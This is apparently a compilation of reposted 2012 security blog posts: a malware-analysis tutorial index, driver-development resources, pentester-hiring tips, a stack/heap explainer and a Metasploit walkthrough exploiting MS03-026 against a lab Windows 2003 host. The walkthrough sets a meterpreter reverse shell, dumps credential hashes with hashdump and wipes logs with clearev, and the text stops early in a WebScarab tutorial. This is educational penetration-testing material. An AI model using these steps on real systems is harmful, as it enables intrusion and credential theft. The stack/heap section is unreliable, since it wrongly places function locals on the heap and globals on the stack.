Monday 30 July 2012

[Tutorials] Malware Analysis Tutorials: a Reverse Engineering Approach

http://fumalwareanalysis.blogspot.com/
=====================================
 Author: Dr. Xiang Fu

Roadmap: You need to first follow Tutorials 1 to 4 to set up the lab configuration. Then each tutorial addresses an independent topic and can be completed separately (each one will have its own lab configuration instructions).

Malware Analysis Tutorial 1- A Reverse Engineering Approach (Lesson 1: VM Based Analysis Platform) 
Malware Analysis Tutorial 2- Introduction to Ring3 Debugging 
Malware Analysis Tutorial 3- Int 2D Anti-Debugging .
Malware Analysis Tutorial 4- Int 2D Anti-Debugging (Part II) 
Malware Analysis Tutorial 5- Int 2D in Max++ (Part III) .
Malware Analysis Tutorial 6- Self-Decoding and Self-Extracting Code Segment .
Malware Analysis Tutorial 7: Exploring Kernel Data Structure .
Malware Analysis Tutorial 8: PE Header and Export Table .
Malware Analysis Tutorial 9: Encoded Export Table
Malware Analysis Tutorial 10: Tricks for Confusing Static Analysis Tools .
Malware Analysis Tutorial 11: Starling Technique and Hijacking Kernel System Calls using Hardware Breakpoints .
Malware Analysis Tutorial 12: Debug the Debugger - Fix Module Information and UDD File .
Malware Analysis Tutorial 13: Tracing DLL Entry Point .
Malware Analysis Tutorial 14: Retrieve Self-Decoding Key .
Malware Analysis Tutorial 15: Injecting Thread into a Running Process .
Malware Analysis Tutorial 16: Return Oriented Programming (Return to LIBC) Attack .
Malware Analysis Tutorial 17: Infection of System Modules (Part I: Randomly Pick a Driver).
Malware Analysis Tutorial 18: Infecting Driver Files (Part II: Simple Infection)
Malware Analysis Tutorial 19: Anatomy of Infected Driver 
Malware Analysis Tutorial 20: Kernel Debugging - Intercepting Driver Loading .
Malware Analysis Tutorial 21: Hijacking Disk Driver 
Malware Analysis Tutorial 22: IRP Handler and Infected Disk Driver
Malware Tutorial Analysis 23: Tracing Kernel Data Using Data Breakpoints 
Malware Analysis Tutorial 24: Tracing Malicious TDI Network Behaviors of Max++  
Malware Analysis Tutorial 25: Deferred Procedure Call (DPC) and TCP Connection 
Malware Analysis Tutorial 26: Rootkit Configuration 
Malware Analysis Tutorial 27: Stealthy Loading of Malicious Driver  
Malware Analysis Tutorial 28: Break Max++ Rootkit Hidden Drive Protection 
Malware Analysis Tutorial 29: Stealthy Library Loading II (Using Self-Modifying APC) 
Malware Analysis Tutorial 30: Self-Overwriting COM Loading for Remote Loading DLL

Device Driver Development For Beginners

http://quequero.org/Device_Driver_Development_For_Beginners
=================================

Introduction

Just a little starter for people interested in starting Kernel-Mode Development. This tutorial is a flexible one, time by time I'll Reload and Expand it.

By following a good thread on UIC forum, opened by a beginner that wanted to know how to start with Device Driver Development, I remembered that long time ago published a similar blog post on that subject.


Development Tools

  1. WDK/DDK - this is the proper Driver Development SDK given by Microsoft, latest edition can be dowloaded http://www.microsoft.com/whdc/DevTools/WDK/WDKpkg.mspx
  2. Visual Studio 2008/2010 - you can also develop without VS, but I always prefer all the Comforts given by a such advanced IDE, especially in presence of complex device drivers.
  3. DDKWizard - DDKWizard is a so-called project creation wizard (for VisualStudio) that allows you to create projects that use the DDKBUILD scripts from OSR (also available in the download section from this site). The wizard will give you several options to configure your project prior to the creation. You can download it http://ddkwizard.assarbad.net/
  4. VisualAssist - (Optional Tool) Visual Assist X provides productivity enhancements that help you read, write, navigate and refactor code with blazing speed in all Microsoft IDEs. You can Try/Buy it http://wholetomato.com/
  5. VisualDDK - Develop and Debug drivers directly from VS, enjoy debugging your driver directly from Visual Studio, speeding up debugging ~18x for VMWare and ~48x for VirtualBox. Download and Step by Step Quick Start Guide http://visualddk.sysprogs.org/quickstart/
  6. Virtual Machine - You need a Virtual Machine to perform efficient Driver Debugging, best options are VMWare or VirtualBox.

Building a Driver Development Environment

As you can see, a good comfortable Driver Development station is composed by a good amount of components, so we need an installation order.
  • Install your IDE - VisualStudio2008 or VisualStudio2010
  • Install WDK package
  • Install DDKWizard
  • Download and place ( usually into C:\WinDDK ) ddkbuild.cmd
  • By following DDKWizard pdf you will be driven to add an new Envirnment Variable directly releated to the OS version in which you are developing and successively add a reference of ddkbuild.cmd into VS IDE. DDWizard Manual is very well written.
  • After finishing DDKWizard integration you can test if your environment is correctly installed, by compilig your first driver. Steps are easy open VS and select DDKWizard templare (not EmptyDriver), you will see the skeleton of a Driver, all what you have to do is to Build Solution and Verify if No Compiling Errors occur, your station is correctly installed.
  • Install VirtualMachine
  • Integrate Debugging help of VisualDDK by following step by step quick start guide
  • Install Visual Assist (this can be done in every moment after VS Installation)

Additional Tools

  • DeviceTree - This utility has two views: (a) one view that will show you the entire PnP enumeration tree of device objects, including relationships among objects and all the device's reported PnP characteristics, and (b) a second view that shows you the device objects created, sorted by driver name. There is nothing like this utility available anywhere else. http://www.osronline.com/article.cfm?article=97
  • IrpTracker - IrpTracker allows you to monitor all I/O request packets (IRPs) on a system without the use of any filter drivers and with no references to any device objects, leaving the PnP system entirely undisturbed. In addition to being able to see the path the IRP takes down the driver stack and its ultimate completion status, a detailed view is available that allows you to see the entire contents of static portion of the IRP and an interpreted view of the current and previous stack locations.
http://www.osronline.com/article.cfm?article=199
  • DebugMon - Displays DbgPrint messages generated by any driver in the system (or the OS itself) in the application window. Can be used either in local mode or can send the DbgPrint messages to another system via TCP/IP. http://www.osronline.com/article.cfm?article=99
  • DriverLoader - This GUI-based tool will make all the appropriate registry entries for your driver, and even allow you to start your driver without rebooting. It's even got a help file, for goodness sakes! If you write drivers, this is another one of those utilities that's a must have for your tool chest. http://www.osronline.com/article.cfm?article=157
Now you have a full working Develop and Debug Station.
As you should imagine, dealing with driver development implies working with at Kernel Mode, a task pretty challenging, delicate and complex. A badly written driver lead to OS Crash and/or dangerous bugs, just think about a driver used in mission-critical applications like Surgery, a bug or a crash could lead to extremely big dangers. The driver need to be:
  • Bug Free
  • Fault Tolerant
  • Ready to Endure all Stress Situations
This could be done, only by the driver coder, with a large knowledge of following fields:
  • Hardware Architecture
  • Operating System Architecture
  • Kernel and User Mode Architecture
  • Rock Solid C language Knowledge
  • Debugging Ability
Here i'm going to enumerate necessary Documentation/Book/Etc. necessary to acheive a good and solid background and advanced knowledge about driver coding.
Microsoft WDK Page: http://www.microsoft.com/whdc/devtools/WDK/default.mspx
Will give you informations about:
  1. WDM ( Windows Driver Model)
  2. WDF (Windows Driver Foundation)
  3. IFS Kit (Installable FileSystem Kit)
  4. Driver Debugging
  5. Driver Stress Testing ( DriverVerifier tool )
PC Fundamentals: http://www.microsoft.com/whdc/system/default.mspx
Device Fundamentals: http://www.microsoft.com/whdc/device/default.mspx
This will give you an large view of 'what mean developing a driver' which components are touched and which aspects you need to know.
It's also obviously necessary to have a Reference about kernel mode involved Functions and Mechanisms, the first best resource is always MSDN, here the starter link to follow MSDN->DDK
http://msdn.microsoft.com/en-us/library/ee663300%28v=VS.85%29.aspx

How to start Learning

  • Driver Development Part 1: Introduction to Drivers
http://www.codeproject.com/KB/system/driverdev.aspx
  • Driver Development Part 2: Introduction to Implementing IOCTLs
http://www.codeproject.com/KB/system/driverdev2.aspx
  • Driver Development Part 3: Introduction to driver contexts
http://www.codeproject.com/KB/system/driverdev3.aspx
  • Driver Development Part 4: Introduction to device stacks
http://www.codeproject.com/KB/system/driverdev4asp.aspx
  • Driver Development Part 5: Introduction to the Transport Device Interface
http://www.codeproject.com/KB/system/driverdev5asp.aspx
  • Driver Development Part 6: Introduction to Display Drivers
http://www.codeproject.com/KB/system/driverdev6asp.aspx
It's really important to put in evicence MemoryManagement at KernelMode, the best starting point for these aspects are tutorials written by four-f;

http://www.freewebs.com/four-f/
Handling IRPs: What Every Driver Writer Needs to Know http://download.microsoft.com/download/9/c/5/9c5b2167-8017-4bae-9fde-d599bac8184a/IRPs.doc

Book Resources

Tutorial are a great starting point, but a solid understanding is given by a set of 'abstracts', emerges the necessity of a good Book Collection:
  • Windows NT Device Driver Development (OSR Classic Reprints)
http://www.amazon.com/Windows-Device-Development-Classic-Reprints/dp/0976717522/ref=sr_1_2?s=gateway&ie=UTF8&qid=1285616242&sr=8-2
  • Windows®-Internals-Including-Windows-PRO-Developer
http://www.amazon.com/Windows%C2%AE-Internals-Including-Windows-PRO-Developer/dp/0735625301/ref=sr_1_1?s=gateway&ie=UTF8&qid=1285616160&sr=8-1
  • The Windows 2000 device driver book: a guide for programmers
http://www.amazon.com/Windows-2000-Device-Driver-Book/dp/0130204315
  • Undocumented Windows 2000 Secrets
http://undocumented.rawol.com/
  • Developing Drivers with WDF
http://www.microsoft.com/whdc/driver/wdf/wdfbook.mspx
  • Windows NT File System Internals, A Developer's Guide
http://oreilly.com/catalog/9781565922495

Web Resources

The first and most important resource about Windows Driver Development is OSROnline:
http://www.osronline.com/
I strongly suggest you to subscribe:
  1. The NT Insider
  2. NTDEV MailingList
  • NDIS Developer's Reference
http://www.ndis.com/
  • Information, Articles, and Free Downloads
http://www.hollistech.com/resources.htm
  • The Undocumented Functions
http://undocumented.ntinternals.net
  • Blog MSDN
http://blogs.msdn.com/iliast
  • Windows Vista Kernel Structures
http://www.nirsoft.net/kernel_struct/vista/
  • Peter Wieland's thoughts on Windows driver development
http://blogs.msdn.com/b/peterwie/
  • USB Driver Development
http://blogs.msdn.com/b/usbcoreblog/
  • Hardware and Driver Developer Blogs
http://www.microsoft.com/whdc/resources/blogs.mspx
Developer Newsgroups
  • microsoft.public.development.device.drivers
  • microsoft.public.win32.programmer.kernel
  • microsoft.public.windbg
Links
  • j00ru//vx tech blog Coding, reverse engineering, OS internals Blog
http://j00ru.vexillium.org/
  • Nynaeve
http://www.nynaeve.net/
  • DumpAnalysis Blog
http://www.dumpanalysis.org/
  • Analyze -v Blog
http://analyze-v.com/
  • Instant Online Crash Dump Analysis
http://www.osronline.com/page.cfm?name=analyze
  • Winsock Kernel (WSK)
http://msdn.microsoft.com/en-us/library/ff571084.aspx
  • Transport Driver Interface (TDI)
http://msdn.microsoft.com/en-us/library/ms819740.aspx
  • Network Driver Interface Specification (NDIS)
http://blogs.msdn.com/b/ndis/
  • System Internals
http://www.microsoft.com/whdc/system/Sysinternals/default.mspx
Driver development needs too many time patience and experience to be fully understood, in my opinion the best approach remains LbD ( Learning by Doing ) so, read, study and develop as many experience you build less BSODs and "strange behavior" you will obtain :)


Thanks

Thanks.

Wednesday 28 March 2012

Hiring pentesters - http://blog.pentesterlab.com

Hiring the right people is becoming harder and harder. I decided to share some tips and feedback based on few years of reading resumes and interviewing people.

I don't think you can really have an equation to rate the right person, I think it's more like a list of things I like or dislike in a resume.

In my opinion, the best hiring process follows the following steps (for the technical side of it):
  • Review resume.
  • Technical interview.
  • Hands-on interview.
  • Drinks.
In this first post, I'm going to provide more details on how I review a resume and what affect my decision.

Pre-processing:
  • Resume looks ugly: -1
  • Obvious spelling mistakes in the resume: -3 (native speakers), -1 (others)
  • Resume sent by a recruiter: +/- 5, some recruiters can take a resume and make it looks terrible or can make it look better...
  • Buzzwords in the resume: -3
  • Hotmail address: -3 ("Excuse me, are you from the past?")
  • Own domain name: +2, with own SMTP server: +3
  • Number of occurrence of the word "hack" in the resume: -1 per occurrence
  • No internet presence: +/-10, can indicate the best and the worst

Formation:
  • Developer formation: +2 someone who can write code will often be more useful than someone who can't
  • Learn different things at school: +3, with special points for Maths, Cryptography, Data Mining, Signal processing, Electronic, ...
  • Didn't go to high school: +/-0, some really really smart people didn't spend much time at school.

Job experiences:
  • Job hopper: -5, training people takes time (especially if you're not using our exercises), you cannot afford to hire someone who is going to leave after a year (with your company's knowledge).
  • More than 7 years working for one big company/big 4 and bragging about it: -2, if someone is not happy, he should move on, and not stay at the same place for that long
  • Worked as a developer: +2, someone who can write code will often be more useful than someone that can't.
  • Web site developer: +3, a big part of our job is web-based, knowing how to develop for the web gives people a lot of knowledge needed for penetration testing (common mistakes, ability to review code, ...).

Certifications:
  • CEH: -2, too often I have been disappointed during technical interview by CEH. Most of them just want to hack stuff and don't learn properly how things work.
  • CISSP: -3, CISSP is in my opinion a good certification for people who want to show general knowledge in security... not really the kind of people a pentest company is after in my opinion.
  • ISO-2700*: -4, same as CISSP with even less technical knowledge
  • PCI-DSS: -2, not really technical but some really good people are certified.
  • All of these certifications together: -3
  • Special points for "Firstname Lastname CISSP": -4

IT knowledge:
  • List tool instead of Technic: -3, sqlmap" instead of "sql injection"
  • List really old security tools: -3
  • Obvious lack of security knowledge: -10, Non-sense in the resume for example
Code:
  • github profile: +5
  • github profile with projects: +5, +3 if really good code, +4 if code in different languages
  • github profile with patches for opensource projects: +5 (-3 if advisory published for silly vulnerabilities)

Vulnerabilities:
  • published a vulnerability in some project in version 0.1: -3, +3 if it's a full code review and they found "all" the bugs and report them prior to the disclosure.
  • published a stack-overflow in some Russian mp3 player: -3 (typical CEH profile)

Others:
  • References from someone: +10
  • Twitter account: +1, -1 if only chitchat, -3 if security circus, +2 if real information on vulnerabilities
  • Blog with interesting articles: +5
  • Play CTF: +5
  • Available on IRC: +2
  • Talk during conferences: +5, unless talk on SCADA: -3
  • Read Phrack: +5
  • Wrote in Phrack: +20 (Phrack is the *BIG* deal, writing in phrack shows both a lot of skills and the good attitude)
Hobbies:
  • Any achievement: +3, black belt in some martial arts, won something, ...
  • Did/do some team sports: +/- 0. to be honest I don't think most good pentesters are team players, they are more like traders, sharing information/tools with people they know/like/respect or people who share with them.


I know a lot of people won't agree with this rating, mostly because it's really subjective (and part of it is a bit trollish I guess). However, most of the time it provides a good overview of a resume... Obviously, if I get a resume that matches all these points, I will be really suspicious now :p 
 
==============================================================
 
After the first post on hiring pentesters I thought I had to keep going... A lot of people read it and apparently liked it... If you are really interested by the interview process, matasano's one is pretty impressive...

Before the interview (or even before you read the resume), it's good to have a basic opinion on someone's skills... I wrote a simple website with 20 questions to get a quick feeling of who I'm talking to.

The questions are simple but allow to detect people with no security knowledge. Below are 2 of the 20 questions so you can see what I'm talking about:
  • unmd5 is the PHP function used to retrieve the clear text of a md5 ? True/False
  • Windows passwords are stored in C:\Windows\System32\drivers\etc\shadow ? True/False
If someone passes this test, the real technical interview can start.

As always, you will have the normal security questions (I guarantee most security companies ask for these):
  • explain a tcp handshake
  • how Windows passwords are stored?
  • what is a cookie?
  • opinion on disclosure?
From my experience, I think it's better to ask people to explain things than just to ask them what it's. You can really see what level of understanding people have of a problem...

For example, with Cross Site Scripting, you can have the following responses:
  • "it's a problem of filtering and it allows an attacker to inject script in the page"
  • "it's a problem of filtering and an attacker can display/run arbitrary code in victims' browser"
  • "it's a problem of output encoding and can be used to inject Javascript or HTML in the page sent back to victims"
  • ...
That way, you're able to see if the person really understands what's going on and how he will be able to explain it to someone else.

You need to have 2 types of questions:
  • questions based on memory: "what port is used by X", "what nmap options do you used"
  • questions based on reflection: "how will you solve that problem"

I also have my favorite set of questions:
  • "You're going to PentesterLab's website, explain what happens...", that way you can see someone's knowledge of TCP/IP, DNS, HTTP, SSL, ...
  • "What is the last cool thing you learned/read", that way you can see what people are interested by and where they at
After this test, another interview is setup with hands-on test (only if the person did good enough obviously), it's currently the web application of the exercise "From SQL injection to shell" and it's used to see how people think and behave with a computer.

You can see a lot of different things:
  • what people use for desktop
  • how fast someone is with his computer
  • how people solve a problem
  • if people bring a working laptop (yes it happened, someone came to an interview with a broken gentoo...)
  • learn from people: sometime people show you cool tricks you didn't think of
  • ...
Obviously, not everyone (actually only one person did it without any help so far) knows how to exploit a SQL injection manually (why do you think I created PentesterLab). But during the test, we help people and show how things work to see how they can learn new things and incorporate information into their way of thinking.
 

Thursday 8 March 2012

What is heap and stack?

The stack is a place in the computer memory where all the variables that are declared and initialized before runtime are stored. The heap is the section of computer memory where all the variables created or initialized at runtime are stored.

What are the memory segments?

The distinction between stack and heap relates to programming. When you look at your computer memory, it is organized into three segments:
  • text (code) segment
  • stack segment
  • heap segment
The text segment (often called code segment) is where the compiled code of the program itself resides. When you open some EXE file in Notepad, you can see that it includes a lot of "Gibberish" language, something that is not readable to human. It is the machine code, the computer representation of the program instructions. This includes all user defined as well as system functions.
Heap and stack - what is it?
Now let's get to some details.

What is stack?

The two sections other from the code segment in the memory are used for data. The stack is the section of memory that is allocated for automatic variables within functions.
Data is stored in stack using the Last In First Out (LIFO) method. This means that storage in the memory is allocated and deallocated at only one end of the memory called the top of the stack. Stack is a section of memory and its associated registers that is used for temporary storage of information in which the most recently stored item is the first to be retrieved.

What is heap?

On the other hand, heap is an area of memory used for dynamic memory allocation. Blocks of memory are allocated and freed in this case in an arbitrary order. The pattern of allocation and size of blocks is not known until run time. Heap is usually being used by a program for many different purposes.
The stack is much faster than the heap but also smaller and more expensive.

Heap and stack from programming perspective

Most object-oriented languages have some defined structure, and some come with so-called main() function. When a program begins running, the system calls the function main() which marks the entry point of the program. For example every C, C++, or C# program must have one function named main(). No other function in the program can be called main(). Before we start explaining, let's take a look at the following example:
int x;                           /* static stack storage */
void main() {
   int y;                        /* dynamic stack storage */
   char str;                    /* dynamic stack storage */
   str = malloc(50);        /* allocates 50 bytes of dynamic heap storage */
   size = calcSize(10);       /* dynamic heap storage */
When a program begins executing in the main() function, all variables declared within main() will be stored on the stack.
If the main() function calls another function in the program, for example calcSize(), additional storage will be allocated for the variables in calcSize(). This storage will be allocated in the heap memory segment.
Notice that the parameters passed by main() to calcSize() are also stored on the stack. If the calcSize() function calls to any additional functions, more space would be allocated at the heap again.
When the calcSize() function returns the value, the space for its local variables at heap is then deallocated and heap clears to be available for other functions.
The memory allocated in the heap area is used and reused during program execution.
It should be noted that memory allocated in heap will contain garbage values left over from previous usage.
Memory space for objects is always allocated in heap. Objects are placed on the heap.
Built-in datatypes like int, double, float and parameters to methods are allocated on the stack.
Even though objects are held on heap, references to them are also variables and they are placed on stack.
The stack segment provides more stable storage of data for a program. The memory allocated in the stack remains in existence for the duration of a program. This is good for global and static variables. Therefore, global variables and static variables are allocated on the stack.

Why is stack and heap important?

When a program is loaded into memory, it takes some memory management to organize the process. If memory management was not present in your computer memory, programs would clash with each other leaving the computer non-functional.

Heap and stack in Java

When you create an object using the new operator, for example myobj = new Object();, it allocates memory for the myobj object on the heap. The stack memory space is used when you declare automatic variables.
Note, when you do a string initialization, for example String myString;, it is a reference to an object so it will be created using new and hence it will be placed on the heap.

===========================================

The stack is the memory set aside as scratch space for a thread of execution. When a function is called, a block is reserved on the top of the stack for local variables and some bookkeeping data. When that function returns, the block becomes unused and can be used the next time a function is called. The stack is always reserved in a LIFO order; the most recently reserved block is always the next block to be freed. This makes it really simple to keep track of the stack; freeing a block from the stack is nothing more than adjusting one pointer.
The heap is memory set aside for dynamic allocation. Unlike the stack, there's no enforced pattern to the allocation and deallocation of blocks from the heap; you can allocate a block at any time and free it at any time. This makes it much more complex to keep track of which parts of the heap are allocated or free at any given time; there are many custom heap allocators available to tune heap performance for different usage patterns.

Stack:
  • Stored in computer RAM like the heap.
  • Variables created on the stack will go out of scope and automatically deallocate.
  • Much faster to allocate in comparison to variables on the heap.
  • Implemented with an actual stack data structure.
  • Stores local data, return addresses, used for parameter passing
  • Can have a stack overflow when too much of the stack is used. (mostly from inifinite (or too much) recursion, very large allocations)
  • Data created on the stack can be used without pointers.
  • You would use the stack if you know exactly how much data you need to allocate before compile time and it is not too big.
  • Usually has a maximum size already determined when your program starts
Heap:
  • Stored in computer RAM like the stack.
  • Variables on the heap must be destroyed manually and never fall out of scope. The data is freed with delete, delete[] or free
  • Slower to allocate in comparison to variables on the stack.
  • Used on demand to allocate a block of data for use by the program.
  • Can have fragmentation when there are a lot of allocations and deallocations
  • In C++ data created on the heap will be pointed to by pointers and allocated with new or malloc
  • Can have allocation failures if too big of a buffer is requested to be allocated.
  • You would use the heap if you don't know exactly how much data you will need at runtime or if you need to allocate a lot of data.
  • Responsible for memory leaks


Each thread gets a stack, while there's typically only one heap for the application (although it isn't uncommon to have multiple heaps for different types of allocation).

  • The OS allocates the stack for each system-level thread when the thread is created. Typically the OS is called by the language runtime to allocate the heap for the application.
  • The stack is attached to a thread, so when the thread exits the stack is reclaimed. The heap is typically allocated at application startup by the runtime, and is reclaimed when the application (technically process) exits.
  • The size of the stack is set when a thread is created. The size of the heap is set on application startup, but can grow as space is needed (the allocator requests more memory from the operating system).
  • The stack is faster because the access pattern makes it trivial to allocate and deallocate memory from it (a pointer/integer is simply incremented or decremented), while the heap has much more complex bookkeeping involved in an allocation or free. Also, each byte in the stack tends to be reused very frequently which means it tends to be mapped to the processor's cache, making it very fast.

Wednesday 29 February 2012

Penetration Testing with Metasploit Framework - Author: Dinesh Shetty

Contents

 
 
Introduction

When I say "Penetration Testing tool" the first thing that comes to your mind is the world's largest Ruby project, with over 700,000 lines of code 'Metasploit' [Reference 1]. No wonder it had become the de-facto standard for penetration testing and vulnerability development with more than one million unique downloads per year and the world's largest, public database of quality assured exploits.

The Metasploit Framework is a program and sub-project developed by Metasploit LLC. It was initially created in 2003 in the Perl programming language, but was later completely re-written in the Ruby Programming Language. With the most recent release (3.7.1) Metasploit has taken exploit testing and simulation to a complete new level which has muscled out its high priced commercial counterparts by increasing the speed and lethality of code of exploit in shortest possible time.


In this article, I will walk your through detailed step by step sequence of commands along with graphical illustrations to perform effective penetration testing using Metasploit framework.
 
 
Working with Metasploit

Metasploit is simple to use and is designed with ease-of-use in mind to aid Penetration Testers.

Metasploit Framework follows these common steps while exploiting a any target system
  1. Select and configure the exploit to be targeted. This is the code that will be targeted toward a system with the intention of taking advantage of a defect in the software.Validate whether the chosen system is susceptible to the chosen exploit..
  2. lect and configure a payload that will be used. This payload represents the code that will be run on a system after a loop-hole has been found in the system and an entry point is set.t.
  3. Select and configure the encoding schema to be used to make sure that the payload can evade Intrusion Detection Systems with ease.
  4. Execute the exploit.
 
I will be taking you through this demo in BackTrack 5 [Reference 2], so go ahead and download that if you don't already have it. The reason for using BackTrack 5 is that it comes with perfect setup for Metasploit and everything that Pen Testing person ever need.

Metasploit framework has three work environments, the msfconsole, the msfcli interface and the msfweb interface. However, the primary and the most preferred work area is the 'msfconsole'. It is an efficient command-line interface that has its own command set and environment system.

Before executing your exploit, it is useful to understand what some Metasploit commands do. Below are some of the commands that you will use most. Graphical explanation of their outputs would be given as and when we use them while exploiting some boxes in later part of the article.
 
  1. search <keyword>: Typing in the command 'search' along with the keyword lists out the various possible exploits that have that keyword pattern.

  2. show exploits: Typing in the command 'show exploits' lists out the currently available exploits. There are remote exploits for various platforms and applications including Windows, Linux, IIS, Apache, and so on, which help to test the flexibility and understand the working of Metasploit.

  3. show payloads: With the same 'show' command, we can also list the payloads available. We can use a 'show payloads' to list the payloads.

  4. show options: Typing in the command 'show options' will show you options that you have set and possibly ones that you might have forgotten to set. Each exploit and payload comes with its own options that you can set.

  5. info <type> <name>: If you want specific information on an exploit or payload, you are able to use the 'info' command. Let's say we want to get complete info of the payload 'winbind'. We can use 'info payload winbind'.

  6. use <exploit_name>: This command tells Metasploit to use the exploit with the specified name.

  7. set RHOST <hostname_or_ip>: This command will instruct Metasploit to target the specified remote host.

  8. set RPORT <host_port>: This command sets the port that Metasploit will connect to on the remote host.

  9. set PAYLOAD <generic/shell_bind_tcp>: This command sets the payload that is used to a generic payload that will give you a shell when a service is exploited.

  10. set LPORT <local_port>: This command sets the port number that the payload will open on the server when an exploit is exploited. It is important that this port number be a port that can be opened on the server (i.e.it is not in use by another service and not reserved for administrative use), so set it to a random 4 digitnumber greater than 1024, and you should be fine. You'll have to change the number each time you successfully exploit a service as well.

  11. exploit: Actually exploits the service. Another version of exploit, rexploit reloads your exploit code and then executes the exploit. This allows you to try minor changes to your exploit code without restarting the console

  12. help: The 'help' command will give you basic information of all the commands that are not listed out here.
 
Now that you are ready with all the basic commands you need to launch your exploit, lets get in action with live target system using Metasploit.
 
 
 
Pen Testing using Metasploit
 
Here is the demonstration of pen testing a vulnerable target system using Metasploit with detailed steps.
 
Victim Machine
OS: Microsoft Windows Server 2003
IP: IP: 192.168.42.129
 
Attacker (Our) Machine
OS: Backtrack 5
Kernel version: Linux bt 2.6.38 #1 SMP Thu Mar 17 20:52:18 EDT 2011 i686 GNU/Linux
Metasploit Version: Built in version of metasploit 3.8.0-dev
IP: 192.168.42.128
 
Our objective here is to gain remote access to given target which is known to be running vulnerable Windows 2003 Server.

Here are the detailed steps of our attack in action,
 
 
Step 1
 
Perform an Nmap [Reference 3] scan of the remote server 192.168.42.129

The output of the Nmap scan shows us a range of ports open which can be seen below in Figure 1
 
Pen Testing with Metasploit
 
We notice that there is port 135 open. Thus we can look for scripts in Metasploit to exploit and gain shell access if this server is vulnerable.
 
 
Step 2:
 
Now on your BackTrack launch msfconsole as shown below
Application > BackTrack > Exploitation Tools > Network Exploit Tools > Metasploit Framework > msfconsole
 
Pen Testing with Metasploit
 
During the initialization of msfconsole, standard checks are performed. If everything works out fine we will see the welcome screen as shown 
 
Pen Testing with Metasploit 
 
 
Step 3: 
 
Now, we know that port 135 is open so, we search for a related RPC exploit in Metasploit.

To list out all the exploits supported by Metasploit we use the "show exploits" command. This exploit lists out all the currently available exploits and a small portion of it is shown below
 
Pen Testing with Metasploit 
 
As you may have noticed, the default installation of the Metasploit Framework 3.8.0-dev comes with 696 exploits and 224 payloads, which is quite an impressive stockpile thus finding a specific exploit from this huge list would be a real tedious task. So, we use a better option. You can either visit the link http://metasploit.com/modules/ or another alternative would be to use the "search <keyword>""command in Metasploit to search for related exploits for RPC.command in Metasploit to search for related exploits for RPC.

In msfconsole type "search dcerpc" to search all the exploits related to dcerpc keyword as that exploit can be used to gain access to the server with a vulnerable port 135. A list of all the related exploits would be presented on the msfconsole window and this is shown below in figure 5.
 
Pen Testing with Metasploit 
 
 
Step 4: 
 
Now that you have the list of RPC exploits in front of you, we would need more information about the exploit before we actually use it. To get more information regarding the exploit you can use the command,  "info exploit/windows/dcerpc/ms03_026_dcom"  

This command provides information such as available targets, exploit requirements, details of vulnerability itself, and even references where you can find more information. This is shown in screenshot below,
 
Pen Testing with Metasploit 
 
 
Step 5:  
 
The command "use <exploit_name>" activates the exploit environment for the exploit <exploit_name>. In our case we will use the following command to activate our exploit
"use exploit/windows/dcerpc/ms03_026_dcom"
 
Pen Testing with Metasploit 
 
From the above figure we can see that, after the use of the exploit command the prompt changes from "msf>" to "msf exploit(ms03_026_dcom) >" which symbolizes that we have entered a temporary environment of that exploit. 
 
 
Step 6: 
 
Now, we need to configure the exploit as per the need of the current scenario. The "show options" command displays the various parameters which are required for the exploit to be launched properly. In our case, the RPORT is already set to 135 and the only option to be set is RHOST which can be set using the "set RHOST" command.

We enter the command "set RHOST 192.168.42.129"
and we see that the RHOST is set to 192.168.42.129
 
Pen Testing with Metasploit 
 
 
Step 7: 
 
The only step remaining now before we launch the exploit is setting the payload for the exploit. We can view all the available payloads using the "show payloads" command.

As shown in the below figure, "show payloads" command will list all payloads that are compatible with the selected exploit.
 
Pen Testing with Metasploit 
 
For our case, we are using the reverse tcp meterpreter which can be set using the command, "set PAYLOAD windows/meterpreter/reverse_tcp" which spawns a shell if the remote server is successfully exploited. Now again you must view the available options using "show options" to make sure all the compulsory sections are properly filled so that the exploit is launched properly. 
 
Pen Testing with Metasploit 
 
We notice that the LHOST for out payload is not set, so we set it to out local IP ie. 192.168.42.128 using the command "set LHOST 192.168.42.128" 
 
 
Step 8: 
 
Now that everything is ready and the exploit has been configured properly its time to launch the exploit.

You can use the "check" command to check whether the victim machine is vulnerable to the exploit or not. This option is not present for all the exploits but can be a real good support system before you actually exploit the remote server to make sure the remote server is not patched against the exploit you are trying against it.

In out case as shown in the figure below, our selected exploit does not support the check option.
 
Pen Testing with Metasploit 
 
The "exploit" command actually launches the attack, doing whatever it needs to do to have the payload executed on the remote system. 
 
Pen Testing with Metasploit 
 
The above figure shows that the exploit was successfully executed against the remote machine 192.168.42.129 due to the vulnerable port 135.
This is indicated by change in prompt to "meterpreter >". 
 
 
Step 9: 
 
Now that a reverse connection has been setup between the victim and our machine, we have complete control of the server. We can use the "help" command to see which all commands can be used by us on the remote server to perform the related actions as displayed in the below figure.
 
Pen Testing with Metasploit 
 
Below are the results of some of the meterpreter commands.  
 
"ipconfig" prints the remote machines all current TCP/IP network configuration values
"getuid" prints the server's username to he console.
"hashdump" dumps the contents of the SAM database.
"clearev" can be used to wipe off all the traces that you were ever on the machine. 
 
 
 
Summary 
 
Thus we have successfully used Metasploit framework to break into the remote Windows 2003 server and get shell access which can be used to control the remote machine and perform any kind of operations.

Here are potential uses of the Metasploit Framework 
  • Metasploit can be used during penetration testing to validate the reports by other automatic vulnerability assessment tools to prove that the vulnerability is not a false positive and can be exploited. Care has to taken because not only does it disprove false positives, but it can also breaks things.
  • Metasploit can be used to test the new exploits that come up nearly everyday on your locally hosted test servers to understand the effectiveness of the exploit.
  • Metasploit is also a great testing tool for your intrusion detection systems to test whether the IDS is successful in preventing the attacks that we use to bypass it. 
 
 
References

 
Conclusion

This article presented high level overview of using Metasploit for penetration testing with example of exploiting RPC vulnerability in remote Windows 2003 server. Armed with this basic knowledge along with more research, you can create your own exploits and perform Penetration Testing like never before.
 

Hacking Web Applications using WebScarab - Author: Abhinav_Singh

Contents

Introduction

In this short tutorial, we will see how to use WebScarab [Reference 1] to easily and transparently intercept web traffic. This is one of the basic step in web application hacking and analysis of web security. Even casual hackers can use it to see what goes behind the screen while you browse particular website.
WebScarab is a framework for analysing web applications by operating as intercepting proxy, allowing the user to review and modify HTTP requests created by the browser before they are sent to the server, and to review and modify responses returned from the server before they are received by the browser. WebScarab is able to intercept both HTTP and HTTPS communication. This makes it one of the powerful tool when it comes to web application security.

Here we will see how to setup WebScarab and then use it to intercept & analyze web traffic.
Setting up WebScarab

Before we proceed with actual game, you need to download and install the WebScarab [Reference 1]. After you have installed the setup you will first have to setup your browser so that WebScarab can act as proxy server.

I am taking the example of Firefox here but similar steps will apply to other web browsers also.
